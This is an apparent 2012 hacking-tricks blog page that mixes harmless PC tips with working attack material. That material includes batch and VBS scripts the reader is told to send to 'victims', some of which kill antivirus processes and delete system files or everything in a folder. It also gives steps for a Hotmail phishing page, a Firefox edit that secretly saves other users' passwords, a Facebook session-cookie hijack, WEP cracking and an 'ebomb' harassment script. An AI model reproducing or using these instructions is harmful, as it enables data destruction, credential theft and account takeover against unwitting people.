Thursday 2 February 2012

Make your pc about 200% faster


 Go to start then click run and then type regedit
 Select HKEY_CURRENT_USER and then select control panel folder and then select desktop folder. Do it correctly
 You will see registry setting at your right hand side, after that select menu show delay and then right click and select modify.
 you will find edit string option -----> default value data is 400 , you have to change the value Data to 000
 Restart your computer. You will notice that your computer has become much more faster

Make a folder without a name


 Click the folder, then right click on it, then click rename and delte the old name.
Then pressing ALT button from your keyboard and type 0160 after that press enter.
Important think to notice - you have to type by holding the ALT button, don't stop pressing and while you will type 0160 it will not appear.You should continue typing and then press enter. Another important thing is that you have to type the code (0160) by your numpad. If you type the code from the upper number key it won't work. So, make sure your Numpad key is on.

How Create Virus fun not notorious purpose

Find some detail of How to make some virus ( Not notorious) for just fun and send it to Your target.Your victim will find his/her self in trouble when he/she wil open the file which you sent.But when he/she shut down the PC He/she will get Window notification,By disableing The notification the effect of virus will be delete.


Please note that Some virus tips are not notorious but Some One are really harmful so Think Twice before using this tips
.


(1) Frustrate your friend by hitting his/her PC Backspace simultaneously:


Open Note pad and copy following code

Code:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shel l")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop



Save it as "Anything.VBS" and send it your victim. When he or she try to open this file his/her PC hitting Backspace simultaneously .


(2)Hack your Victim's keyboard and make him type "You are a fool" simultaneously:

Open Note pad and copy following code

Code:
Set wshShell = wscript.CreateObject("WScript.Shell ")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop


Save it as "Anything.VBS" and send it.

(3) Open Notepad continually in your Victim's computer:

Open Note pad and copy following code

Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


Save it as "Anything.BAT" and send it.


(4)FAKE VIRUS:

Copy Paste In Notepad And Save As"Hi .bat" File

code:

@echo off
title VIRUS
color 06

echo YOU HAVE A VIRUS ON YOUR COMPUTER
pause
echo CONTACTING ANTI-VIRUS....
pause
echo DO YOU WANT TO DELETE VIRUS?
pause
echo ACCESS DENIED
echo ACCESS DENIED
echo ACCESS DENIED
pause
echo ACTIVATING VIRUS.....
echo VIRUS ACTIVATED!!!!
pause
:1
dir/s
goto 1


(5) for jamming hard disk...Open Note pad and copy following code

Source Code:-

//START v.c
#include
#include
void main()
{
while(1)
{
system("dir>> â•ša.exe");
}
}
//END


open ur note pad just copy as it is paste it in that ........
name any like Hi.exe...
but .exe is must.....
don't try on ur pc it's small but power full....

(6) deleate all available installed programs;try this out copy this and paste in notepad and rename it abc.bat & send it Victims computer

title Hack Setup
color 0A
@echo off
set end=md "Hack installing"
set fin=copy "Hack log.txt" "Installing"
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked....
msg * I warned you, and you kept going. Challenge me and this is what happens.
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown



it will deleate all available installed programs!!!!!!!!!!!!!!!!!!!

try urself!!!!!!!!!!!!!!!!!!


(7) Formate hole computer:

Open up notepad and type:

DEL /F /Q *

Save it as "virus.cmd" You can change virus to whatever you want.

DONT OPEN IT!

It deletes everything on your computer.

Send it to your victim, say when they open it all their dreams will come true or some crap.

Hack your Victim's keyboard and make him type "You are a fool" simultaneously

Open Note pad and copy following code

Code:
Set wshShell = wscript.CreateObject("WScript.Shell ")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop



Save it as "Anything.VBS" and send it

How hackers hack Hotmail or windows live id



Hotmail is also a very famous email service. It is widely used in US and European countries. Today i am going to write how to hack hotmail id. We will use phishing for hacking. The complete process with phoshing script is given below.


follow these steps:

1: download the hotmail phishing page below. This phishing page uses php for storing password in text files
Hotmail phishing


2: Host this script to any free webhost that support php. Get the list of some free host from here


3: Now check your script on your host. this page is just like hotmail login page.


4: send this page to victim via mail or any other service and force him to sign in from this page. Use any kind of social engineering for this.


5: check stored password in yourdomain/detail.txt page

Speed up your firefox browser

Speed up your browsing speed of firfox browser. You just need to change some firefox settings. follow these steps-


1- Type "about:config" into the address bar and hit enter. Scroll down the page and look for the following entries in the table shown.


network.http.pipelining
network.http.pipelining.maxrequests
network.http.proxy.pipelining


2- change the values of these entries as follows:


Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests" to some number like 30.


3- At Last right click anywhere in the page and select New --> Integer in the popup menu. Give it's name as follow:


"nglayout.initialpaint.delay" and set its value to "0". 


This new value is the amount of time that browser waits before it acts on any information it receives. 
Now your surfing speed will be much faster than before....
try it..

Auto Save Passwords Without Notification in Firefox




Hey friends. Today i am going to write about a simple firfox hack which helps you to hack your friends easily. When ever you try to login in any account, firefox shows a notification asking for store user name and password for this website. But aftre using this trick it will never ask to store the password but it would atomatically store all the password. Its ideal trick if you want to get someones login details who uses your computer.

follow these steps:
1) First of all you need to close firefox.
2) Now locate the nsloginmanagerprompter.js file which is normally found in
C:\ProgramFiles\MozillaFirefox\Components\
3) Open nsloginmanagerprompter.js with notepad or other editor. But the editor which would show the line number will be ideal.
4) Replace the entire line 804 to 869 with the following code
var pwmgr = this._pwmgr;
pwmgr.addLogin(aLogin);

After replacing this, save this file
Now it's done. yeppie....
To see the usernames + passwords, go to tools --> options --> security --> saved password

How to remove adware, trojan, spyware, keyloggers and worms from the computer




Now a day, we can not think our life without internet. But internet also comes with various computer threats. While we are surfing some website, there are some possibilites that our system is getting infection.


Your PC is probably infected with adware & spyware if:

  • You have downloaded music online
  • Your PC is running extremely slow
  • You are pestered by those horrible popup ads
  • Your homepage keeps changing



What is Spyware and Adware?

Spyware and Adware is software made by publishers that allow them to snoop on your browsing activity, invade your privacy, and flood you with those horrible popups. If you are like most users on the internet, chances are you are probably infected with these applications. That is why we have designed our revolutionary product.


Why does Spyware and Adware affect every internet user?


  • All information you enter via the web can be intercepted 
  • Unauthorized sites can add themselves to your desktop (icons) 
  • Unauthorized sites can add themselves to your internet favorites 
  • Your browsing activity can be tracked and monitored
  • Unwanted toolbars and searchbars can attach themselves to your browser without your knowledge or approval
  • Your personal information can be sold to other parties without your knowledge or consent 
  • Your default homepage and settings can be hijacked so you can't 
  • change them 
  • These malicious components not only invade your PC so they can not be removed, but take up your hard drive space and slow down your PC!
  • To protect our system and data, we need some good tools which can protect our system. No adware is a nice tool with great technology. This protects your system and data from various type of threats. 



Download it from here

SQL Inject me - website hacking with firefox

Firefox is a nice web browser and you can also improve its performance and usage with some available addons. If you love penetration testing or trying to hack a website, firefox can be a hacking tool for you.

SQL Injection is a well known vulnerability of websites which can be found in most of the website using database. The main reason for this vulnerability is that web developers always ignore some security measures. So hacking a website with SQL injection is usually easy in most of the websites.

SQL Inject Me is a firefox addon which turns firefox web browser into SQL injection testing tool. The tool works by submitting your HTML forms and substituting the form value with strings that are representative of an SQL Injection attack.

The tool works by sending database escape strings through the form fields. It then looks for database error messages that are output into the rendered HTML of the page.

The tool does not attempting to compromise the security of the given system. It looks for possible entry points for an attack against the system. There is no port scanning, packet sniffing, password hacking or firewall attacks done by the tool.

You can think of the work done by the tool as the same as the QA testers for the site manually entering all of these strings into the form fields.

Add to your firefox from here:

https://addons.mozilla.org/en-US/firefox/addon/sql-inject-me/?src=search

Make a Private Folder with your password

Step 1:- Open the Notepad.exe
Step 2:- Copy the following code into the notepad.
Quote: cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDENTER PASSWORD TO OPEN
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
echo Press (Y) for Yes and Press (N) for No.
echo -----------------------------------------------------------
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to unlock folder
set/p "pass=>"
if NOT %pass%==
YOUR PASSWORD goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDENTER PASSWORD TO OPEN
md Private
echo Private created successfully
goto End
:End


Step 3:- Now change the password in the if NOT %pass%==YOUR PASSWORDgoto FAIL line replace text of Your
Password with your password for the folder lock.
Step 4:- Now save this file as locker.bat and you are done.
Step 5:- Now Open the Locker.bat file and enter your password to open a private folder of yours.
Step 6:- Now copy paste the files which you want to hide and make it secure in the private folder.
Step 7:- Now again open the Locker.bat file and press 'Y' to lock the private folder with your password.
Step 8:- Now to again open the secured files open the locker.bat file Enter your password and your files are there for you.

What is hacking?



1.originally, someone who makes furniture with an axe1. A person who enjoys exploring the details of programmable systems and how to stretch their capabilities, as opposed to most users, who prefer to learn only the minimum necessary.

2. One whoprograms enthusiastically (even obsessively) or who enjoys programming
rather than just theorizing about programming.

3. Aperson capable of appreciating hack value.

4. A person who is good at programming quickly.

5. An expert at a particular program, or one who frequently does work using it or on it; as in ‘a
Unix hacker.’ (Definitions 1 through 5 are correlated, and people who fit them congregate.)

6. An expert or enthusiast of any kind. One might be an astronomy hacker, for example.
7. One who enjoys the intellectual challenge of creatively overcoming or circumventing
limitations.

8. [deprecated] A malicious meddler who tries to discover sensitive information by poking around. Hence
‘password hacker,’ ‘network hacker.’ The correct term for this sense is cracker.

Cracker


One who breaks security on a system. Coined ca. 1985 by hackers
in defense against journalistic misuse of hacker (q.v., sense . An
earlier attempt to establish ‘worm’ in this sense around 1981–82
on Usenet was largely a failure.

Use of both these neologisms reflects a strong revulsion against
the theft and vandalism perpetrated by cracking rings. While it is
expected that any real hacker will have done some playful cracking
and knows many of the basic techniques, anyone past larval stage
is expected to have outgrown the desire to do so except for immediate,
benign, practical reasons (for example, if it’s necessary to get
around some security in order to get some work done).
Thus, there is far less overlap between hackerdom and crackerdom
than the mundane reader misled by sensationalistic journalism
might expect. Crackers tend to gather in small, tight-knit,
very secretive groups that have little overlap with the huge, open
poly-culture this lexicon describes; though crackers often like to
describe themselves as hackers, most true hackers consider them a
separate and lower form of life.

It’s clear that the term cracker is absolutely meant to be derogatory. One
shouldn’t take the tone too seriously though, as The Jargon File is done with a
sense of humor, and the above is said with a smile. As we can see from the
above, illegal or perhaps immoral activity is viewed with disdain by the “true
hackers,” whomever they may be. It also makes reference to cracker being a
possible intermediate step to hacker, perhaps something to be overcome.

Script Kiddie


The term script kiddie has come into vogue in recent years. The term refers to
crackers who use scripts and programs written by others to perform their intrusions.
If one is labeled a “script kiddie,” then he or she is assumed to be incapable
of producing his or her own tools and exploits, and lacks proper
understanding of exactly how the tools he or she uses work. As will be apparent
by the end of this chapter, skill and knowledge (and secondarily, ethics) are the
essential ingredients to achieving status in the minds of hackers. By definition,
a script kiddie has no skills, no knowledge, and no ethics.

Phreak


A phreak is a hacker variant, or rather, a specific species of hacker. Phreak is
short for phone phreak (freak spelled with a ph, like phone is). Phreaks are
hackers with an interest in telephones and telephone systems. Naturally, there
has been at times a tremendous amount of overlap between traditional hacker
roles and phreaks.

White Hat/Black Hat/Gray Hat

White Hat Hacker:


White Hat hackers are good guys who does the hacking for defensing. They probably work an organization for providing security.

Black Hat Hacker

Black hat hackers are bad guys(the malicious
hackers or crackers). They usually steal the other bank information and
steal the money.
They use their skills for illegal purposes.
They are creators of viruses,malware,spyware.
They will destroy your pc.

Gray Hat Hackers


Grey hats are hackers who may work offensively or defensively, depending on the situation.
This is the dividing line between hacker and cracker. Both are powerful forces on the Internet,
and both will remain permanently. And some individuals qualify for both categories. The
existence of such individuals further clouds the division between these two groups of people.
In addition to these groups, there are self-proclaimed ethical hackers, who are interested in
hacker tools mostly from a curiosity standpoint. They may want to highlight security problems
in a system or educate victims so they secure their systems properly. These hackers are
doing their “victims” a favor. For instance, if a weakness is discovered in a service offered by
an investment bank, the hacker is doing the bank a favor by giving the bank a chance to rectify
the vulnerability.

Ebomb a virus for fun



This is a simple attack that enables running multiple applications in
victims pc just to harass him. There are many ways to ebomb but this is the most easiest way to do it. Simply open notepad and type

@echo off
start iexplore
start notepad
start firefox


and save it as anyname.bat (note: paste the code with "start " in many times to annoy them)

you can also do some additional stuff like enter the message for victim eg. msg * "(Now your pc is getting Hacked)" and also you can open some websites to irritate victim eg. start iexplore "www.ethicalhack4u.blogspot.com" start firefox "www.maverick-deepanker.blogspot.com" (simply add them in the .bat file you created) Now just like always upload the file on any online storage (rapidshare, ziddu,hotfile or fileserve) and send the link to your victim (you can probably make him believe that its game or just any other app simply by converting the .bat in .exe by using any batch to exe converter. You can also send it via pen drive. The main purpose is to send it to victim. When victim will open it .............. 
Sample eg.
@echo off
msg * "(sorry buddy but you just f*$%d your self)"
start iexplore "
ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

start iexplore "ethicalhack4u.blogspot.com"
start firefox "
www.maverick-deepanker.blogspot.com"
start notepad

denial-of-service (DoS) attack

In a denial-of-service (DoS) attack, an attacker attempts to prevent
legitimate users from accessing information or services. By targeting your computer and its network connection, or the computers and network of the sites you are trying to use, an attacker may be able to prevent you from accessing email, websites, online accounts (banking, etc.), or other services that rely on the affected computer.



The most common and obvious type of DoS attack occurs when an attacker "floods" a network with information. When you type a URL for a particular website into your browser, you are sending a request to that site's computer server to view the page. The server can only process a certain number of requests at once, so if an attacker overloads the server with requests, it can't process your request. This is a "denial of service" because you can't access that site.
An attacker can use spam email messages to launch a similar attack on your email account. Whether you have an email account supplied by your employer or one available through a free service such as Yahoo or Hotmail, you are assigned a specific quota, which limits the amount of data you can have in your account at any given time. By sending many, or large, email messages to the account, an attacker can consume your quota, preventing you from receiving legitimate messages.



How do you avoid being part of the problem?

Unfortunately, there are no effective ways to prevent being the victim of a DoS or DDoS attack, but there are steps you can take to reduce the likelihood that an attacker will use your computer to attack other computers:


  • Install and maintain anti-virus software.
  • Install a firewall, and configure it to restrict traffic coming into and leaving your computer.
  • Follow good security practices for distributing your email address. Applying email filters may help you manage unwanted traffic.

Facebook Session Hijack


The cookie which facebook uses to authenticate it's users is called "Datr",
If an attacker can get hold of your authentication cookies, All he
needs to do is to inject those cookies in his browser and he will
gain access to your account. This is how a facebook authentication
cookie looks like:

Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;

How To Steal Facebook Session Cookies And Hijack An Account? 

An attacker can use variety of methods in order to steal your facebook
authentication cookies depending upon the network he is on, If an
attacker is on a hub based network he would just sniff traffic with any
packet sniffer and gain access to victims account.

If an attacker is on a Switch based network he would use an ARP
Poisoning request to capture authentication cookies, If an attacker is
on a wireless network he just needs to use a simple tool called
firesheep in order to capture authentication cookie and gain access to
victims account.

In the example below I will be explaining how an attacker can capture
your authentication cookies and hack your facebook account with
wireshark.

Step 1 - First of all download wireshark from the official website and install it.

Step 2 - Next open up wireshark click on analyze and then click on interfaces.

Step 3Next choose the appropriate interface and click on start.



Step 4 - Continue sniffing for around 10 minutes.

Step 5After 10minutes stop the packet sniffing by going to the capture menu and clicking on Stop.

Step 6 - Next set the filter to http.cookie contains “datr”
at top left, This filter will search for all the http cookies with the
name datr, And datr as we know is the name of the facebook
authentication cookie.



Step 7Next right click on it and goto Copy - Bytes - Printable Text only.












Step 7 Next right click on it and goto Copy - Bytes - Printable Text only.



Step 8Next you’ll want to open up firefox. You’ll need both Greasemonkey and the cookieinjector script. Now open up Facebook.com and make sure that you are not logged in.

Step 9- Press Alt C to bring up the cookie injector, Simply paste in the cookie value into it.



Step 10 - Now refresh your page and viola you are logged in to the victims facebook account.




NoteThis Attack will only work if victim is on a http:// connection and even on https:// if end to end encryption is not enabled.

THIS ARTICLE IS ORIGINALLY WRITTEN BY RAFAY BALOCH. HE BLOGS AT www.rafayhackingarticles.net

Install windows xp very fast

Now, this tip will be very helpful for those who frequently install windows xp operating system.Normally OS installation takes around 40 minutes to complete, but through this trick you can now save 10-15 minutes. This simple tricks goes this way.

1. Boot through Windows XP CD.

2. After all the files are completely loaded, you get the option to select the partition. Select “c”.
3. Now Format the partition, whether it is normal or quick with NTFS or FAT
4. Once the formatting is completed, All the setup files required for installation arcopied.Restart your system by pressing Enter. Now, here begins the Simple trick to save 10-15 minutes.
5. After rebooting, you get a screen where it takes 40 minutes to complete or finalize the OS installation.
6. Now, Press SHIFT + F10 Key -> This opens command prompt.
7. Enter “Taskmgr” at the command prompt window. This will open Task Manager.
8. Click the Process Tab, here we find a process called Setup.exe -> Right Click on Setup.exe -> Set Priority -> Select High or Above Normal. Initially it will be Normal. Thats it, no more work to do. Relax your self and see how fast the installation process

HOW TO HACK A WiFi PASSWORD


  1. Install Comm-view, then paste the included “cv.exe” to the directory you installed it to (c:program filescommviewwifi)
  2. Open commview and install the commview drivers to a card. It should prompt you about your card and than automatically install the driver. It is important that you have 1 card that works with commview or else the rest of the tutorial will not work
  3. Go to the “rules” tab and check “enable advanced rules”
  4. Type in the box labled formula “tods=1 and dmac=FF:FF:FF:FF:FF:FF” then type a name for your formula in the box labled name and than click add/edit.
  5. This should now appear in the upper box. if it is not checked, check it.
  6. Click settings>options>memory usage and turn maximum packets in buffer to 20000 (max). If it prompts you to restart it, do so. There are three funnel looking things on the main menu bar of commview. uncheck all but the first one (one labled “capture data packets”)
  7. Click the play button and scan for the network you want to crack.
  8. Once you have found it, drag the channel menu down to the desired channel and click capture.
  9. Now using your other adapter thats not capturing, connect to the password protected network. when it asks you for key, type in something random, i used 1234567890.
  10. It should now say connected with limited connectivity.
  11. Go back to your commview menu and click on the packets tab. you should see a couple of packets.
  12. Looking at the protocol column, you should see a couple labled IP/UDP, ARP REQ, and a couple of others. Right click on any packet labled “ARP REQ” and than click send packet, and selected. A mini menu should now appear.
  13. On the mini menu, change packets per second to 2000, and rather than 1 time(s), click continuously, and Then click send.
  14. Go back to the main commview window and go to the rules tab, and uncheck the rule you made.
  15. You are now injecting and you should see the number of packets rising really fast.
  16. Save the packets, you have to save every 20000 packets, click file, save and than in the save dialogue, remember where you saved it, and instead of saving it as an ncf file, save it as a “dump” .cap file.
  17. Extract the Aircrack-NG folder.
  18. open aircrack-ng-GUI that can be found in the map “bin” and select the files you saved, and than click launch.
  19. Look at the list of IV’s you have, and select the network you want to crack , there should be a list of a lot of them, chose the one with the most IVs.
  20. You are connected to your neighbor’s Wi-Fi